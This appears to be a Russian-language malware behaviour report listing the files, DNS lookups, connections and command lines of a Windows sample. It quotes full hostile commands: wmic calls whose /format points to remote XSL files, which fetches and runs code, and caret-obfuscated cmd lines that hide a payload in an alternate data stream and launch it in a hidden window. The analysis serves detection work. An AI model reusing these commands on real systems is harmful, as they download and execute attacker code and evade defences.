Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' os get birruussj, 4668866, Version /format:"http://ra#.####ubusercontent.com/GCMaia/Sharing/master/.idea/libraries/x/06/v.xsl#025077aWUYIIHJJ"
- '<SYSTEM32>\wbem\wmic.exe' os get JVUNEIGF, GNRISJFL, JYQFKJTV, currenttimezone /format:"https://curly-hall-cbd1.sagatana.workers.dev/?06/#731543"
- %TEMP%\6liett9.jpg:66ddaww.cmd
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.ie5\caasbycl\v[1].xsl
- %TEMP%\sxs3b09.tmp
- %TEMP%\ekfsxofc.jpg:init.cmd
- %APPDATA%\microsoft\windows\cookies\user@sagatana.workers[1].txt
- 'ra#.####ubusercontent.com':443
- 'cu#########cbd1.sagatana.workers.dev':443
- http://ra#.####ubusercontent.com/GCMaia/Sharing/master/.idea/libraries/x/06/v.xsl
- DNS ASK ra#.####ubusercontent.com
- DNS ASK cu#########cbd1.sagatana.workers.dev
- '<SYSTEM32>\cmd.exe' /c echo wmic ^os ^get ^JVUNEIGF, ^GNRISJFL, ^JYQFKJTV, ^currenttimezone ^/format:"https://curly-hall-cbd1.sagatana.workers.dev/?06/#731543" > %TMP%\EKFSXOFC.jpg:init.cmd && %ComSpec% - < %TMP%...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' -
- '<SYSTEM32>\cmd.exe' /c echo wmic ^os ^get ^JVUNEIGF, ^GNRISJFL, ^JYQFKJTV, ^currenttimezone ^/format:"https://curly-hall-cbd1.sagatana.workers.dev/?06/#731543" > %TMP%\EKFSXOFC.jpg:init.cmd && %ComSpec% - < %TMP%...